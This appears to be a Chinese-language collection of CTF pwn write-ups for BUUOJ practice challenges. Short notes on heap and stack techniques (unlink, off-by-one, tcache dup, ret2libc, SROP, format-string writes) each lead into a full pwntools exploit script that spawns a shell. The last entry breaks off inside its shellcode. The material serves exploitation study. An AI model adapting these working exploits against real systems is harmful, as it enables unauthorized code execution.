# [ZJCTF 2019]EasyHeap

heap, unlink, overlap

用数组储存堆地址。利用 unlink 将地址指向数组,即可实现任意地址读写。

unlink 修改的堆地址应该为真实地址,而 malloc 返回的地址为用户地址。所以伪造的 fakechunk 要在当前块的头部紧接着的地方。例如:

数组储存的某个块的地址为 0x5010,则该处应为 chunk 的头,所以直接将 fakechunk 输入至 chunk 中。addr 为数组上储存 0x5010 处的地址。unlink 后 addr 指向 addr-0x18,即数组下标小 3 的位置。

地址 0x0 0x8
0x5000 0 0xa1 chunk 开始
0x5010 0 0x91 fakechunk 开始
0x5020 addr-0x18 addr-0x10
0x5030 * *
* * *
0x50 0 0x90 下一 chunk 覆盖 inuse 位
#!/usr/bin/python3
from pwn import *
from LibcSearcher3 import LibcSearcher
context(arch='amd64', log_level='debug')
filename = './easyheap'
libdir = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/'
libc=ELF(libdir + 'libc-2.23.so')
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process("./"+filename+'_pe') if mode else remote('node4.buuoj.cn',28311)
e = ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *0x400c8c')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
def choose(x):
    p.sendlineafter(b'Your choice :', str(x).encode())
    
def mal(size, content):
    choose(1)
    p.sendlineafter(b'Size of Heap :', str(size).encode())
    p.sendafter(b'Content of heap:', content)
def free(index):
    choose(3)
    p.sendlineafter(b'Index :', str(index).encode())
def edit(index, size, content):
    choose(2)
    p.sendlineafter(b'Index :', str(index).encode())
    p.sendlineafter(b'Size of Heap : ', str(size).encode())
    p.sendafter(b'Content of heap : ', content)
heaparray = 0x6020E0
atoi_g = 0x602068
system_p = e.plt['system']
mal(0x18, b'a')
mal(0x18, b'a')
mal(0x18, b'a')
mal(0xa8, b'aa') #size 0xb0 #3
mal(0x90, b'aa') #4
mal(0x18, b'end')
payload = p64(0) + p64(0xa1) + p64(heaparray + 0x8*3 - 0x8*3) + p64(heaparray + 0x8*3 - 0x8*2)
payload = payload.ljust(0xa0, b'a') + p64(0xa0) + p64(0xa0)
edit(3, len(payload), payload)
free(4)
edit(3, 8, p64(atoi_g))
edit(0, 8, p64(system_p))
p.sendlineafter(b'Your choice :', b'/bin/sh\0')
p.interactive()

# hitcontraining_heapcreator

off_by_one, UAF, overlap

可写 got 表。

单字节溢出覆盖下一 chunk 修改其大小,造成堆块重叠。

程序采用固定分配一个 0x10 大小的块来管理用户需要的块的方法,该块前 8 字节储存用户块大小,后 10 字节储存用户块地址。因此调整堆块分配,使得其中一个用户块 ra 与一个管理块 hb 重叠,对 ra 的读写操作可以控制 hb 的数据,由此实现任意地址读写。

最后泄露 got 表上 free 的真实地址获取 libc 版本。然后修改 free 的真实地址为 system 地址。释放含 /bin/sh\0 的块,实现 getshell。

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(arch='amd64', log_level='debug')
filename = 'heapcreator'
#libdir = ''
#libc = ELF(libdir + 'libc-2.23.so')
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',25016)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *0x4008f8')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
def choose(x):
    p.sendlineafter(b'Your choice :', str(x).encode())
    
def mal(size, content):
    choose(1)
    p.sendlineafter(b'Size of Heap : ', str(size).encode())
    p.sendafter(b'Content of heap:', content)
def free(index):
    choose(4)
    p.sendlineafter(b'Index :', str(index).encode())
def edit(index, content):
    choose(2)
    p.sendlineafter(b'Index :', str(index).encode())
    p.sendafter(b'Content of heap : ', content)
def dump(index):
    choose(3)
    p.sendlineafter(b'Index :', str(index).encode())
    p.recvuntil(b'Content : ')
class headchunk():
    def __init__(self, dest, size):
        self.dest = dest
        self.size = size
        
    def out(self):
        payload = 0x10*b'a' + flat([0, 0x21,self.size,self.dest])
        return payload
heaparray = 0x6020a0
free_g = e.got['free']
mal(0x50, b'fh')
mal(0x58, b'uc') #1
mal(0x18, b'fh')
mal(0x18, b'/bin/sh\0') #3
payload = b'a' * 0x58 + p8(0x41)
edit(1, payload)
free(2)
free(0)
mal(0x38, b'ffff') #0 h0 -> h2 -c- r2
mal(0x50, b'ffff') #2 r2 -> r0
ch = headchunk (free_g, 0x18)
edit(0, ch.out())
dump(2)
free_a = u64(p.recvuntil(b'\n')[:-1].ljust(8, b'\0'))
libcs = LibcSearcher('free', free_a)
libcbase = free_a - libcs.dump('free')
sys_a = libcbase + libcs.dump('system')
edit(2, p64(sys_a))
free(3)
p.interactive()

# gyctf_2020_borrowstack

stack_migration

程序给定了栈溢出的地址和对应的两个读取函数。

用老方法,迁移后,泄露 libc 地址,然后构造 system("/bin/sh");

由于程序给予的溢出地址过于接近 got 表及其他数据,在执行 system 时栈增长过长会破坏运行所需数据。因此第二次将栈迁移至 0x601800 处。

#!/usr/bin/python3
from pwn import *
from LibcSearcher3 import LibcSearcher
context(arch='amd64', log_level='debug')
e=ELF('./gyctf_2020_borrowstack')
#p=process('./gyctf_2020_borrowstack_pe')
p=remote('node4.buuoj.cn',29693)
#gdb.attach(p, 'b *0x400626')
lsm_g = e.got['__libc_start_main']
puts_p = e.plt['puts']
read_p = e.plt['read']
main_a = 0x0400680 
target = 0x0601080
target2 = 0x0601800
offset = 0x60
rdi_ret=0x400703
rsi_r15=0x400701
leave_ret = 0x400699
ret = 0x4004c9
payload = b'a'*offset + p64(target) + p64(leave_ret)
p.recvuntil(b'what you want')
p.send(payload)
p.recvuntil(b'now!\n')
payload =p64(target2) + p64(ret)*0x10 + flat([rdi_ret, lsm_g, puts_p, rdi_ret, 0, rsi_r15, target2, 0, read_p, leave_ret])
p.send(payload)
lsm_a = u64(p.recvuntil(b'\x0a')[:-1].ljust(8,b'\0'))
print('libc_start_main ',hex(lsm_a))
libc = LibcSearcher('__libc_start_main',lsm_a)
libcbase = lsm_a - libc.dump('__libc_start_main')
sys_a = libcbase + libc.dump('system')
bs_a = libcbase + libc.dump('str_bin_sh')
sleep(0.5)
payload = p64(ret) +  p64(rdi_ret) + p64(bs_a) + p64(sys_a) 
p.send(payload)
p.interactive()

# babyfengshui_33c3_2016

overlap

head chunk

#!/usr/bin/python3
from pwn import *
from LibcSearcher3 import LibcSearcher
context(arch='i386', log_level='debug')
filename = 'babyfengshui_33c3_2016'
libdir = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/'
libc = ELF(libdir + 'libc-2.23.so')
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',28175)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *0x08048AC0')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
def choose(x):
    p.sendlineafter(b'Action: ', str(x).encode())
    
def mal(size, name, text, wsize=0):
    choose(0)
    p.sendlineafter(b'size of description: ', str(size).encode())
    p.sendlineafter(b'name: ', name)
    if wsize==0:
        wsize=size-1
    p.sendlineafter(b'text length: ', str(wsize).encode())
    p.sendlineafter(b'text: ', text)
    
def free(index):
    choose(1)
    p.sendlineafter(b'index: ', str(index).encode())
def edit(index, size, content):
    choose(3)
    p.sendlineafter(b'index: ', str(index).encode())
    p.sendlineafter(b'text length: ', str(size).encode())
    p.sendlineafter(b'text: ', content)
def dump(index):
    choose(2)
    p.sendlineafter(b'index: ', str(index).encode())
    p.recvuntil(b'description: ')
class headchunk():
    def __init__(self, dest, size=0x28):
        self.dest = dest
        self.size = size
    def out(self):
        payload = flat([self.size,self.dest])
        return payload
ptr = 0x804B080
free_g = e.got['free']
mal(0xc, b'hc', b'start') #0
mal(0x90, b'aaaa', b'bbbb') #1
mal(0xc, b'end', b'/bin/sh\0') #2
free(0)
free(1)
mal(0x2c, b'jump', b'disabled') #3
mal(0xc, b'control', b'writebegin') #4
front = flat({0xc: 0x31, 0xc+0x30: 0x89})
payload = front + p32(free_g)
edit(4, len(payload),  payload)
dump(3)
free_a = u32(p.recv(4))
libcs = LibcSearcher('free', free_a)
libcbase = free_a - libcs.dump('free')
sys_a = libcbase + libcs.dump('system')
edit(3, 4, p32(sys_a))
free(2)
p.interactive()

# 0ctf_2017_babyheap

overlap, double free, malloc_hook,

利用 overlap 构造重叠块,释放 unsorted bin 泄露 libc 地址。

覆盖 malloc_hook 为 one_gadget

# 注意点

分配函数使用 calloc,需注意在分配后是否需要还原堆内容。

#!/usr/bin/python3
from pwn import *
context(arch='amd64', log_level='debug')
filename = '0ctf_2017_babyheap'
libdir = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/'
libc = ELF(libdir + 'libc-2.23.so')
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',26986)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *$rebase(0xD47)')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
def choose(x):
    p.sendlineafter(b'Command: ', str(x).encode())
    
def mal(size):
    choose(1)
    p.sendlineafter(b'Size: ', str(size).encode())
def free(index):
    choose(3)
    p.sendlineafter(b'Index: ', str(index).encode())
def edit(index, size, content):
    choose(2)
    p.sendlineafter(b'Index: ', str(index).encode())
    p.sendlineafter(b'Size: ', str(size).encode())
    p.sendafter(b'Content: ', content)
def dump(index):
    choose(4)
    p.sendlineafter(b'Index: ', str(index).encode())
    p.recvuntil(b'Content: ')
class headchunk():
    def __init__(self, dest, size=0x28):
        self.dest = dest
        self.size = size
    def out(self):
        payload = flat([self.size,self.dest])
        return payload
mal(0x18)
mal(0x18)
mal(0x90)
mal(0x18) #3
mal(0x68)
#payload = b'a'*0x18 + p64(0x41) + b'a'*0x18 + p64 + p64(0x71)
payload = flat({0x18:0x41, 0x18+0x20:0x90, 0x18+0x40:0x71})
edit(0, len(payload), payload)
free(1)
mal(0x38) #1
payload = flat({0x18:0xa1})
edit(1, len(payload), payload)
free(2)
dump(1)
p.recvuntil(p64(0xa1))
mh_a = u64(p.recv(8)) - 0x68
print('[+] the address of malloc hook is:%#x'%mh_a)
libcbase = mh_a - libc.sym['__malloc_hook']
one_gadget = 0x4526a
one_gadget += libcbase
fakechunk = mh_a - 0x23
payload1 = b'\0'*0x13 + p64(one_gadget)
payload = flat({0x18:[0x71,fakechunk]})
free(4)
edit(3, len(payload), payload)
mal(0x68) #2
mal(0x68) #4
edit(4, len(payload1), payload1)
mal(1)
p.interactive()

# hitcon2014_stkof

unlink

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(arch='amd64', log_level='debug')
filename = 'stkof'
libdir = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/'
libc = ELF(libdir + 'libc-2.23.so')
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',26478)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *0x400D31')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
def end():
    p.recvuntil(b'OK\n')
def choose(x):
    p.sendline(str(x).encode())
def mal(size):
    choose(1)
    p.sendline(str(size).encode())
    end()
def free(index, e=1):
    choose(3)
    p.sendline(str(index).encode())
    if e:
        end()
def edit(index, size, content):
    choose(2)
    p.sendline(str(index).encode())
    p.sendline(str(size).encode())
    p.send(content)
    end()
def dump(index):
    choose(4)
    p.sendline(str(index).encode())
    end()
s = 0x602140
free_g = 0x602018
index = (free_g-s)//8
lsm_g = e.got['__libc_start_main']
puts_p = e.plt['puts']
mal(0x18)
mal(0x18)
mal(0x18)
mal(0xa0) #4
mal(0x90)
mal(0x18) #6
payload = p64(0) + p64(0xa1)+ p64(s+0x8*4 - 0x8*3) + p64(s+0x8*4 - 0x8*2)
payload = payload.ljust(0xa0, b'\0') + p64(0xa0) + p64(0xa0)
edit(4, len(payload), payload)
free(5)
# 4 -> 1
edit(4, 0x8, p64(free_g))
edit(1, 0x8, p64(puts_p))
edit(4, 0x8, p64(lsm_g))
free(1,0)
lsm_a = u64(p.recvuntil(b'\x0a')[:-1].ljust(8,b'\0'))
print('[+] the address of lsm is:%#x'%lsm_a)
libcbase = lsm_a - libc.sym['__libc_start_main']
sys_a = libcbase + libc.sym['system']
edit(6, 0x8, b'/bin/sh\0')
edit(4, 0x8, p64(free_g))
edit(1, 0x8, p64(sys_a))
free(6)
p.interactive()

# pwnable_hacknote

uaf, double free

使用一个 0x8(实际占用 0x10,可用空间 0xc)的块来管理用户块。同时有 double free 漏洞。

利用 uaf,泄露 unsorted bin chunk 的 libc 地址,获得 system 的地址。

管理块的前 4 字节储存输出函数,后 4 字节储存用户块的地址。调用该输出函数时会以管理块的地址作为参数,由输出函数将其转换成用户块地址。

将输出函数的地址替换成 system 函数的地址,在其后接入 ;sh\0 。由于管理块首此时为 system 的地址,无法解析,于是可以。

靶机用的不是平时用的 2.23 的 32 位库,用的一个很神奇的看不懂的库。记录一下。

image-20231110011318078

#!/usr/bin/python3
from pwn import *
from LibcSearcher3 import LibcSearcher
context(arch='i386', log_level='debug')
filename = 'hacknote'
libdir = '/mnt/share/pwn/buu/libc/libc6_2.23-0ubuntu10_i386/'
libc = ELF(libdir + 'libc-2.23.so')
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *0x08048A33')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
def choose(x):
    p.sendlineafter(b'Your choice :', str(x).encode())
    
def mal(size, content=b'blank\0'):
    choose(1)
    p.sendlineafter(b'Note size :', str(size).encode())
    p.sendafter(b'Content :', content)
def free(index):
    choose(2)
    p.sendlineafter(b'Index :', str(index).encode())
def dump(index):
    choose(3)
    p.sendlineafter(b'Index :', str(index).encode())
class headchunk():
    def __init__(self, dest, size=0x28):
        self.dest = dest
        self.size = size
    def out(self):
        payload = flat([self.size,self.dest])
        return payload
puts_4 = 0x804862B
while(1):
    p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',25186)
    mal(0x80, b'uc')
    mal(0x20)
    free(0)
    free(1)
    mal(0x8, p32(puts_4)) #2
    dump(0)
    mainarena_48 = u32(p.recv(4))
    mh_a = mainarena_48 - 0x48
    print('[+] the address of malloc hook is:%#x'%mh_a)
    obj = LibcSearcher('__malloc_hook', mh_a)
    libcbase = mh_a - obj.dump('__malloc_hook')
    sys_a = libcbase + obj.dump('system')
    free(2)
    mal(0xc, p32(sys_a)+b';sh\0')
    dump(0)
    p.interactive()

# jarvisoj_level5

ret2libc

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux', arch='amd64', log_level='debug')
filename = 'level3_x64'
libcfile = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/libc-2.23.so'
libc = ELF(libcfile)
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process("./"+filename) if mode else remote('node4.buuoj.cn',26721)
e = ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b ')
main_a = e.sym['main']
write_p=e.plt['write']
lsm_g = e.got['__libc_start_main']
offset = 0x080 + 8
rdi = 0x04006b3
rsi_r15 = 0x04006b1
ret = 0x0400499
payload = offset * b'a' + p64(rdi) + p64(1) + p64(rsi_r15) + p64(lsm_g) + p64(0) + p64(write_p) + p64(main_a)
p.sendafter(b'Input:\n',payload)
lsm_a = u64(p.recvuntil('\x7f').ljust(8,b'\0'))
print('the true address of __libc_start_main is %#x'%lsm_a)
obj = LibcSearcher('__libc_start_main',lsm_a)
libcbase = lsm_a - obj.dump('__libc_start_main')
sys_a = libcbase + obj.dump('system')
bs_a = libcbase + obj.dump('str_bin_sh')
payload = offset * b'a' + p64(rdi) + p64(bs_a) + p64(sys_a) + p64(main_a)
p.send(payload)
p.interactive()
p.close()

# roarctf_2019_easy_pwn

off by one, malloc hook,

最后直接将 malloc_hook 设为 one_gadget,不符合条件。选择利用 realloc 跳板。直接成功了,所以没有再去计算。

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(arch='amd64', log_level='debug')

filename = 'roarctf_2019_easy_pwn'
libcfile = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/libc-2.23.so'
libc = ELF(libcfile)

mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',28961)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)

if mode==2:
    gdb.attach(p, 'b *$rebase(0x121C)')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)

def choose(x):
    p.sendlineafter(b'choice: ', str(x).encode())
    
def mal(size):
    choose(1)
    p.sendlineafter(b'size: ', str(size).encode())
def free(index):
    choose(3)
    p.sendlineafter(b'index: ', str(index).encode())
def edit(index, size, content):
    choose(2)
    p.sendlineafter(b'index: ', str(index).encode())
    p.sendlineafter(b'size: ', str(size).encode())
    p.sendafter(b'content: ', content)
def dump(index):
    choose(4)
    p.sendlineafter(b'index: ', str(index).encode())
    p.recvuntil(b'content: ')


class headchunk():
    def __init__(self, dest, size=0x28):
        self.dest = dest
        self.size = size
    def out(self):
        payload = flat([self.size,self.dest])
        return payload


addrArr = 0x202048
c3 = addrArr + 0x8*3

mal(0x18)
mal(0x18)
mal(0x18)
mal(0x78) #3
mal(0x18)

edit(0, 0x18+10, b'a'*0x18 + b'\x41')
free(1)
mal(0x38) #1

payload = b'a'*0x18 + p64(0xa1)
edit(1,len(payload), payload)
free(2)
dump(1)
p.recvuntil(p64(0xa1))
ma_ = u64(p.recv(8))
mh_a = ma_ - 0x68
print('[+] the address of mh is:%#x'%mh_a)
obj = LibcSearcher('__malloc_hook', mh_a)

libcbase = mh_a - obj.dump('__malloc_hook')
realloc_a = libcbase + obj.dump('realloc')
oneg = 0x4526a
oneg += libcbase
fakeadd = mh_a - 0x23
fakechunk = b'a'*0xb + p64(oneg) + p64(realloc_a)

mal(0x68) #2

free(2) 
payload = b'a'*0x18 + p64(0x71) + p64(fakeadd)
edit(1, len(payload), payload)
mal(0x68) #2
mal(0x68) #5 -> fakechunk
edit(5, len(fakechunk), fakechunk)
mal(1)
p.interactive()

# ciscn_2019_es_7

#!/usr/bin/python3
from pwn import *
context(arch='amd64',log_level='debug')
e=ELF('./ciscn_2019_es_7')
#p=process('./ciscn_2019_es_7')
p=remote('node4.buuoj.cn',28769)
#gdb.attach(p, 'b main')
offset = 0x010
csu_front_addr = 0x0400580
csu_end_addr = 0x040059A
buf = 0x601000 + 0x100
gad = 0x4004D6
syscall = 0x400517
rdi_ret = 0x4005a3
rsi_r15 = 0x4005a1
rax0f = 0x4004da
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_read
sigframe.rdi = 0
sigframe.rsi = buf
sigframe.rdx = 0x400
sigframe.rsp = buf
sigframe.rip = syscall
payload =  b'a' * offset + p64(rax0f) + p64(syscall) + bytes(sigframe)
p.send(payload)
time.sleep(1)
# execv("/bin/sh",0,0)
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = buf + 0x120
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = buf
sigframe.rip = syscall
payload = p64(rax0f) + p64(syscall) + bytes(sigframe)
assert len(payload)<=0x120
payload = payload.ljust(0x120,b'a') + b'/bin/sh\0'
sleep(1)
pause()
p.send(payload)
payload = p64(syscall) + b'/bin/sh\0'
p.interactive()

# mrctf2020_shellcode_revenge

61-7a

41-5a

30-5a

alpha

#!/usr/bin/python3
from pwn import *
#p=process('./mrctf2020_shellcode_revenge')
p=remote('node4.buuoj.cn',29553)

payload = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

p.send(payload)
p.interactive()

# cmcc_pwnme2

ret2libc

系统有给 orw 的漏洞,但我没去利用。

在子函数里即可直接栈溢出。因为是 32 位程序,不需要担心地址的 '\0' 让 strcpy 截断。

#!/usr/bin/python3
from pwn import *
from LibcSearcher3 import LibcSearcher
context(os='linux',arch='i386',log_level='debug')
filename = 'pwnme2'
libcfile = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_i386/libc/lib/i386-linux-gnu/libc-2.23.so'
libc = ELF(libcfile)
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process("./"+filename) if mode else remote('node4.buuoj.cn',29470)
e = ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b gets')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
main_a = e.symbols['main']
puts_p = e.plt['puts']
#write_p = e.plt['write']
lsm_g = e.got['__libc_start_main']
offset=0x06c + 4
#choose use puts or write
payload = b'a'*offset + p32(puts_p) + p32(main_a) + p32(lsm_g)
#payload = b'a'*offset + p32(write_p) + p32(main_a) + p32(1) + p32(lsm_g) +p32(4)
p.sendlineafter(b'Please input:\n',payload)
p.recvuntil(b'\n')
lsm_a = u32(p.recv(4))
print('the true address of __libc_start_main is %#x'%lsm_a)
#choose use LibcSearcher or libc file
#'''
obj = LibcSearcher('__libc_start_main',lsm_a)
libcbase = lsm_a - obj.dump('__libc_start_main')
sys_a = libcbase + obj.dump('system')
bs_a = libcbase + obj.dump('str_bin_sh')
'''
libcbase = lsm_a - libc.sym['__libc_start_main']
sys_a = libcbase + libc.sym['system']
bs_a = libcbase + next(libc.search(b'/bin/sh'))
'''
payload = b'a'*offset + p32(sys_a) + p32(main_a) + p32(bs_a) 
p.sendline(payload)
p.interactive()
p.close()

# picoctf_2018_got_shell

修改 got

拥有一次任意读写的机会。主函数最后使用 exit 退出。还有后门函数。got 表可写。

很明显了,修改 exit 的 got 表为后门函数的地址。

#!/usr/bin/python3
from pwn import *
context(log_level='debug')
#p=process('./PicoCTF_2018_got-shell')
p=remote('node4.buuoj.cn',27411)
gadget = 0x0804854B
exit_g = 0x0804A014
p.sendline(hex(exit_g).encode())
p.sendline(hex(gadget).encode())
p.interactive()

image-20231110150108645

# mrctf2020_easy_equation

fmtstr

数学题

17 ^ x4 - 13x^3 + 11x^2 - 7x =198image-20231110151048985

解得 x=2

利用 printf 格式化漏洞将 judge 的值修改为 2。

#!/usr/bin/python3
from pwn import *
context(arch='amd64',log_level='debug')
#p=process('./mrctf2020_easy_equation')
p=remote('node4.buuoj.cn',28696)
#gdb.attach(p, 'b printf')
target = 0x60105C
payload = b'a' + fmtstr_payload(8,{target:2}, 1)
print(payload)
p.sendline(payload)
p.interactive()

# npuctf_2020_easyheap

tcache dup, off_by_one, overlap

该题目运行于 ubunut 18.04,经查找,libc 版本为 2.27,此版本在 2.26 之后,已经开始使用 tcache。但 tcache 相关机制还未完善,tcache dup 的实现十分便捷。

释放堆块后数组清空地址。且只能分配真实大小 0x20 和 0x40 的用户块,管理块固定为 0x20.

首先调整堆块排列,构造出两个 0x20 的用户块 a 和 b 相邻的情况。其中地址高的那块往下与 0x20 的 c 块相连。利用 off_by_one 将 b 块的 size 设为 0x41。形成堆块重叠。

由此,b 块可以控制 c 块内容。将 c 块释放后,用 b 块往 c 块写入 free 的 got 地址。因为两者都为 0x20 大小,所以下一次分配可以得到管理块为 c 块,用户块为 got 表 free 的块。由此可对其进行读写。

为了泄露 free 的地址用于计算 system 的地址,一开始不能修改到 free_got 的数据。但分配函数分配完便要求一次输入。因此选择分配到 free_got 低一位的地址,在分配时输入任意非空字符。之后覆盖 free 地址时也记得补上 1 偏移。(另一种解决方法是泄露 got 表中下一项_exit 的值)

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(arch='amd64', log_level='debug')
filename = 'npuctf_2020_easyheap'
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',28329)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b *0x400E75')
    
def choose(x):
    p.sendlineafter(b'Your choice :', str(x).encode())
    
def mal(size, content=b'aaaa'):
    choose(1)
    p.sendlineafter(b'Size of Heap(0x10 or 0x20 only) : ', str(size).encode())
    p.sendafter(b'Content:', content)
def free(index):
    choose(4)
    p.sendlineafter(b'Index :', str(index).encode())
def edit(index, content):
    choose(2)
    p.sendlineafter(b'Index :', str(index).encode())
    p.sendafter(b'Content: ', content)
def dump(index):
    choose(3)
    p.sendlineafter(b'Index :', str(index).encode())
    p.recvuntil(b'Content :')
mal(0x38)
mal(0x38)
mal(0x18)
mal(0x18) #3
mal(0x18) #4
free(2)
free(1)
mal(0x18) #1 low
free(0)
mal(0x18) #0 high
mal(0x38) #2
mal(0x38) #6
edit(1, b'a'*0x18 + p8(0x41))
free(0)
mal(0x38) #0
free_g = e.got['free']
free(3)
edit(0, b'a'*0x18 + p64(0x21) + p64(free_g-1))
mal(0x18, b'a') #3
dump(3)
p.recvuntil(b'a')
free_a = u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\0'))
print('[+] free addr: %#x'%free_a)
libc = LibcSearcher('free', free_a)
libcbase = free_a - libc.dump('free')
sys_a = libcbase + libc.dump('system')
edit(3, b'\0' + p64(sys_a))
edit(4, b'/bin/sh\0')
free(4)
p.interactive()

# wdb_2018_2nd_easyfmt

fmt

泄露 libc 地址,然后修改 printf_got 为 system。

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux',arch='i386',log_level='debug')
filename = 'wdb_2018_2nd_easyfmt'
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process("./"+filename) if mode else remote('node4.buuoj.cn',27983)
e = ELF('./'+filename)
if mode==2:
    gdb.attach(p, 'b ')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
main_a = e.symbols['main']
printf_g = e.got['printf']
lsm_g = e.got['__libc_start_main']
offset=6
p.recvuntil(b'Do you know repeater?\n')
payload = b'%7$s' + p32(lsm_g)
p.send(payload)
lsm_a = u32(p.recv(4))
print('the true address of __libc_start_main is %#x'%lsm_a)
obj = LibcSearcher('__libc_start_main',lsm_a)
libcbase = lsm_a - obj.dump('__libc_start_main')
sys_a = libcbase + obj.dump('system')
bs_a = libcbase + obj.dump('str_bin_sh')
print('[+] system add: %#x'%sys_a)
payload = fmtstr_payload(6,{printf_g:sys_a})
p.sendafter(b'\n',payload)
p.sendafter(b'\n',b'/bin/sh\0')
p.interactive()
p.close()

# hitcontraining_bamboobox

unlink, got

构造 unlink 指向 itemlist,然后实现任意地址读写。注意每次写会自动在最后面添加 '\0' ,所以需要调整以防出事。

可能还能用 overlap,因为写入数量不限。其次也许可以通过修改最开始程序自己分配的 0x10 内储存的地址来实现 getshell,但由于填充 0 字符以及 printf 输出,导致泄露 heap 地址有些困难。

其次 magic 是假的,flag 文件只放在了根目录。所以老实怎么来怎么来吧。

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(arch='amd64', log_level='debug')

filename = 'bamboobox'
libcfile = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/libc-2.23.so'
libc = ELF(libcfile)

mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process('./'+filename+'_pe') if mode else remote('node4.buuoj.cn',26150)
e = ELF('./'+filename+'_pe') if mode else ELF('./'+filename)

if mode==2:
    gdb.attach(p, 'b *0x400E42')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)

def choose(x):
    p.sendafter(b'Your choice:', str(x).encode())
    
def mal(size, content=b'aaaa'):
    choose(2)
    p.sendafter(b'length of item name:', str(size).encode())
    p.sendafter(b'name of item:', content)
def free(index):
    choose(4)
    p.sendafter(b'the index of item:', str(index).encode())
def edit(index, size, content):
    choose(3)
    p.sendafter(b'index of item:', str(index).encode())
    p.sendafter(b'length of item name:', str(size).encode())
    p.sendafter(b'name of the item:', content)
def dump():
    choose(1)


array = 0x6020c0
c1 = array + 0x10*1 + 0x8
magic = 0x0400D49
free_g = e.got['free']

mal(0x18)
mal(0xa8)
mal(0x98)
mal(0x18) #3

payload = p64(0) + p64(0xa1) + p64(c1 - 0x8*3) + p64(c1-0x8*2)
payload = payload.ljust(0xa0,b'\0') + p64(0xa0) + p32(0xa0)
edit(1, len(payload), payload)
free(2)

payload = p64(0x18) + p64(free_g) + p32(0xa8)
edit(1, len(payload), payload)
dump()
p.recvuntil(b'0 : ')
free_a = u64(p.recv(6)+b'\0\0')

libc = LibcSearcher('free', free_a)
libcbase = free_a - libc.dump('free')
sys_a = libcbase + libc.dump('system')

edit(3, 7, b'/bin/sh')
edit(0, 7, p64(sys_a)[:-1])
free(3)
p.interactive()

与上面 hitcontraining_bamboobox 是同一题

# [极客大挑战 2019] Not Bad

shellcode

#!/usr/bin/python3
from pwn import *
context(arch='amd64', log_level='debug')
#p=process('./bad')
p=remote('node4.buuoj.cn',28542)
#gdb.attach(p, 'b*0x0400A01')
jmprsp = 0x0400A01
offset = 0x020
shellcode = '''
mov rsi, rsp
xor rdi, rdi
